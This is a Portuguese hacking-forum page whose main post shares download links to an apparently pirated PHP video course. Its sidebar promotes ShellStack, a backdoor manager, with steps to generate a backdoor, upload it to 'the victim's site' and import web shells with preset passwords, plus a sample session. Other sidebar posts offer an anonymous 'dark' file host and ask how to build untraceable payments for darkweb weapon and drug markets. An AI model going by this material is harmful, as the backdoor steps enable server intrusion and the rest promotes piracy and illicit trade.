Ir para conteúdo
Entre para seguir isso  
kmbrazil

Curso de PHP do Zero ao Profissional - Bonieky Lacerda‎

Recommended Posts

Em 09/02/2019 em 00:06, kmbrazil disse:

Curso de PHP do Zero ao Profissional - Bonieky Lacerda‎

php-do-zero-ao-profissional-curso-do-bon

Tamanho Total: 21.3 GB
Formato dos Arquivos: MP4/M4V

Links:

Parte 1:Download

Parte 2: Download

Parte 3:Download

*Caso alguns videos não executar instale o K-Lite codec* 

Foda!!! Um dos melhores cursos que já foram postados... Parabéns mesmo!!!!!!!!!

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
Entre para seguir isso  



  • Conteúdo Similar

    • Por João Escobar
      O DARK_FILES está finalizado galera! 
      Ontem postei sobre ele no Facebook pedindo ajuda na questão da criptografia e, hoje, após um dia inteiro trabalhando nele consegui fazer uma criptografia FODA e finalizá-lo!
      Pra quem tiver interesse em conhecer:
      http://darkfiles.hk.tn/
      O QUE É:
      Hospedagem de arquivos 100% anônima (criptografia individual), limpa (sem anúncios/espera), segura e sem deixar rastros (server anon na Espanha, rs). Aqui seus arquivos 'dark' ficarão seguros.
      ~Por enquanto~ o upload máximo é 10MB, mas logo logo vai ser alterado pra mais. QUALQUER crítica/sugestão é muito bem vinda e vai ajudar muito.
      Fiz esse projeto pra estudo, com inspiração no antigo ObscuredFiles.
      Façam bom uso 
    • Por Prosniper
      Uma ferramenta baseada em PHP que ajuda você a gerenciar todos os seus sites Backdoored de forma eficiente. 

      O ShellStack é uma ferramenta de gerenciamento de backdoor baseada em PHP. Esta ferramenta é útil para "HACKERS" que desejam manter uma faixa de cada site que eles cortaram. A ferramenta gera um arquivo de backdoor que você só precisa carregar no site e colocar o URL de backdoor no shells.txt presente no diretório da ferramenta.
      Com ShellStack você pode
      Importar shells PHP Obter detalhes do servidor Carregar arquivos do seu sistema usando seu terminal E acima de tudo, você pode gerenciar suas portas traseiras de forma eficiente  Como usar
      git clone https://github.com/Tuhinshubhra/shellstack cd shellstack php shellstack.php generatebd saia utilizando CTRL + C  Isso gerará um arquivo de backdoor no mesmo diretório que a ferramenta em um arquivo chamado backdoor.php Carregue o arquivo Backdoor para o site da Vítima Copie o URL do Backdoor e cole-o no arquivo shells.txt presente no diretório da ferramenta e salve-o ( Cada backdoor está separado por uma nova linha ) php shellstack.php Digite o número de série atribuído ao Backdoor O resto é bastante auto-explicativo Veja o vídeo aqui:  Requisitos
      php curl Exemplo
      [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php ________________________________________________________________________________ _______ _ _ _______ _______ _______ _______ _______ _ _ |______ |_____| |______ | | |______ | |_____| | |____/ ______| | | |______ |_____ |_____ ______| | | | |_____ | \_ ________________________________________________________________________________ Simple Backdoor Management System Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra Shout Out: LulZSec India ================================================================================ List Of Backdoors: 0. http://localhost/backdoor.php ============================================= [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0 [+] Shell Selected: http://localhost/backdoor.php [+] Validating Backdoor: Backdoor Found! List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):2 [+] Server Info [i] Sending Request And Getting Response... [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64 [i] Server IP: 127.0.0.1 Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):1 List Of Shells =============== [1] Dhanush shell {User & Pass : shellstack123} [2] B374K shell {Pass : shellstack123} [3] Kurama shell V.1.0 {Pass : red} [4] WSO shell {Pass : shellstack123} [5] MiNi shell {User & Pass : shellstack123} [#] Select Shell To Import(1-5):1 [i] Importing Shell... [i] Sending Request And Getting Response... [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):5 [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# Versão 
      Versão 1.0 Screenshot

      Tutorial retirado do site:  http://www.kitploit.com
    • Por Ice_Boy
      Acabei de lançar um espaço em meu projeto para softwares e aplicações que utilizem como base os princípios da matemática, segue link: http://webzhiak.com.br/apps/.
      Além de você poder utilizar o app em seu navegador, poderá ver o código fonte no github
    • Por Zaraki Kenpachi
      Acessando Métodos não estáticos, a partir de um método estático.
      Sabe-se que em PHP, não se pode usar o $this dentro de métodos estáticos. E que também ao acessar um método estático, o construtor não é executado. Então, utiliza-se muito de um hack method pra que não seja necessário instanciar a classe pra utilizar-se dos outros métodos não estáticos. Segue um exemplo:
      Método normal:
      Acessando de forma normal, classes não estáticas:
      <?php class Banco {// private static $Conn; function __construct(){ self::$Conn = new PDO('mysql:host=localhost;dbname=meuDb', 'root', ''); } public function consulta($queryString){ $stmt = self::$Conn->prepare($queryString); $stmt->execute(); return $stmt->fetchAll(); } }// {// Executando a consulta $db = new Banco;//Instanciando um objeto da classe Banco $dadosRetornados = $db->consulta("SELECT * FROM produtos");// Utilizando o método consulta, a partir do objeto criado. } O que acontece aqui é o seguinte... Temos uma classe que faz consulta no banco de dados e por padrão, temos de instanciar um objeto dessa classe pra que possamos utilizar de seus métodos de consulta.
      Acessando pelo hack method
      Acessando metodo sem ter que instanciar classes:
      <?php class Banco {// private static $Conn; private static $Instance; function __construct(){ self::$Conn = new PDO('mysql:host=localhost;dbname=meuDb', 'root', ''); } public static function run(){ if(is_null(self::$Instance)){ self::$Instance = new self(); } return self::$Instance; } public function consulta($queryString){ $stmt = self::$Conn->prepare($queryString); $stmt->execute(); return $stmt->fetchAll(); } }// {// Executando a consulta $db = Banco::run()->consulta("SELECT * FROM produtos"); } O que acontece no código acima é: Criamos um método estático, que retorna uma instância de objeto da própria classe. Ou seja, ao invés de termos de instanciar a classe por nós mesmos, esse método estática (Que lembrando, pode ser acessada sem que um objeto dessa classe seja instanciado anteriormente por ser static) faz isso por nós.
    • Por Gh0s7
      Estive observando alguns marketplaces na darkweb e percebi que eles tem uma espécie de "carteira" própria, que gera endereços automaticamente para cada transação, fazendo com que cada uma delas seja única. 
      Pesquisando um pouco mais, notei que existem APIs próprias de algumas empresas para fazer com que você possa processar pagamentos online e receber esse valor direto na sua carteira em determinada plataforma.
      Entretanto, alguns marketplaces vendem conteúdo não muito ortodoxo, como armas e drogas e isso implica que eles não possam usar essas APIs afim de não serem identificados, presos e processados por algum governo.
      Daí então vem a minha dúvida, eles tem um mecanismo muito similar ao das APIs, entretanto, são próprios, rodam no servidor dos próprios marketplaces, alguém tem ideia de como isso funciona ou de como fazer algo parecido?
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.